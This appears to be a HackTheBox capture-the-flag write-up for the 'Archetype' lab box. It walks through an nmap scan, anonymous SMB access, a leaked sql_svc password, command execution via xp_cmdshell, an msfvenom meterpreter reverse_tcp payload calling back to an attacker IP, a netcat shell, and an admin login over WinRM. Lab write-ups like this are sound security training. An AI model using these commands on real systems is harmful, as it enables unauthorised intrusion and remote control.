# HackTheBox-Archetype
## NMAP
```bash
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info:
| Target_Name: ARCHETYPE
| NetBIOS_Domain_Name: ARCHETYPE
| NetBIOS_Computer_Name: ARCHETYPE
| DNS_Domain_Name: Archetype
| DNS_Computer_Name: Archetype
|_ Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-05-09T05:37:36
| Not valid after: 2051-05-09T05:37:36
| MD5: dd26 d0f2 bf23 57ec 693e 11af 7fe6 51f3
|_SHA-1: be4f 58af 20c9 c656 7ae4 4c6a bbfe 1ae2 6ce8 7f16
|_ssl-date: 2021-05-09T05:48:20+00:00; +18m07s from scanner time.
PORT STATE SERVICE VERSION
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
```
From the scan we scan see SMB service is running so we can check if we are allowed to access shares as `anonymous` user
## PORT 139/445 (SMB)
Here we can see we can read `backups` share so let's do it
Download the file using `get prod.dtsConfig`
On reading the file we can there's a password for `sql_svc` service account
Let's verify it through `crackmapexec`
And it seems the credentials are valid, so I am going to be using `sqsh` which is an opensource interactive database shell
Now to execute windows commands we are going to use `xp_cmdshell` which spawns a windows command shell . xp_cmdshell is an extended stored procedure provided by Microsoft and stored in the master database. So the whole command will be
```
EXEC master ..xp_cmdshell 'whoami'
```
Here `EXEC` is used to execute stored procedure on a database and stored procedures are kinda like functions in mysql /mssql.
Perfect now we need to what's our current location in file system so we may upload our payload and get a proper shell
Right now we are in `system32` folder where we don't have permissions to read and write so we may need to save our payload in a directory where we are allowed to
This looks the directory for the service account or user in this case now since he has his own directory
Generate a windows 64 bit metepreter payload
```
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.220 LPORT=2222 -f exe > shell.exe
```
Now host this on local machine using python3
And download it like this
But whenever I try to execute the payload it would get deleted so there's some schedule tasks or scripts running in the background so can't do it like this also I tried uploading a powershell script and executing but that was blocked as well
So the only option left was to upload a netcat executable for 64 bit version
Then simply run the executable
Running `whoami /all` we can see privileges on the machine
I tried to use `PrintSpoofer`exploit but it failed
At this point I took a hint for the escalation because everything was failing and it wasn't meant to be exploited like that so I was told to find password for `Administrator` account so I started to view hidden files with `dir /a`
Since WinRM port is open we can remotely login using these credentials